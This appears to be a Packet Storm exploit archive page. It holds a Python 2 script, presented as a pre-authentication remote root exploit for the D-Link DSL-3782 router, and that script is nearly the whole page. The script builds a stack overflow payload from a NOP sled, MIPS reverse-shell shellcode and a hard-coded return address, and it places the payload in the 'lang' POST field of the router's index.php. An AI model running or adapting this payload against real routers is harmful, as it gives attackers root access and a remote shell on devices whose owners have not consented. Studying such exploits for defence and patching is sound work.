exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

D-Link DSL-3782 Pre-Authentication Remote Root

D-Link DSL-3782 Pre-Authentication Remote Root
Posted Nov 27, 2021
Authored by Cody Sixteen

D-Link DSL-3782 pre-authentication remote root exploit.

tags | exploit, remote, root
SHA-256 | 39250461aeadf7ef7255a1a2d870e1e43ea66083e97d1b047cdd0a89783991a9

D-Link DSL-3782 Pre-Authentication Remote Root

Change Mirror Download
#!/usr/bin/python2
# preauth rece for dlink dsl-3782
# found: 06.11.2021
# pwned: 18.112021 @ 19:26
#


import sys
import urllib2 # requests
import urllib
import struct

target = 'http://192.168.0.50/index.php' # cgi-bin/ChgLang.asp'




nopsled = ""
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
for i in range(74):
nopsled += "\x41\x41\x41\x41" # 26\x40\x08\x01"


#print("nopsled len: %s" % len(nopsled))
#print(len(nopsled))


# shellcode; revshell: 272-232=?:
buf = b""
buf += b"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01"
buf += b"\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01"
buf += b"\x01\x0c\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70"
buf += b"\x27\x24\x0d\xff\xfd\x01\xa0\x68\x27\x01\xcd\x68\x04"
buf += b"\x24\x0e\x27\x0f\x01\xae\x68\x25\xaf\xad\xff\xe0\xaf"
buf += b"\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x02\x10"
buf += b"\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff"
buf += b"\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25"
buf += b"\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02"
buf += b"\x10\x20\x25\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02"
buf += b"\x10\x48\x01\x01\x01\x0c\xaf\xa2\xff\xff\x24\x11\xff"
buf += b"\xfd\x02\x20\x88\x27\x8f\xa4\xff\xff\x02\x20\x28\x21"
buf += b"\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x22"
buf += b"\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff\x3c\x0f"
buf += b"\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"
buf += b"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4"
buf += b"\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27"
buf += b"\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c"


shellcode = buf


#shellcode = ( "D" * 276 )





ret = struct.pack(">I", 0x7fff45b0) # ;] 0x7fff4528) # 0x2abccbb0) # system(); 0x2b269fcc) # SELECT... x2accefcc) # 0x123456) # 0x42424242)
junk = "A" * 68 # 136 # 264 # (596 - len(shellcode) - len(ret)) # - len(nopsled))




###############
#payload = junk + shellcode + ret
payload = nopsled + shellcode + junk + ret

#print(len(payload))
print(payload)

data = urllib.urlencode({'lang' : payload })

sendme = urllib2.Request(target, data ) # url=target, data=post_me)

#print(sendme)

#print "DONE"













Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close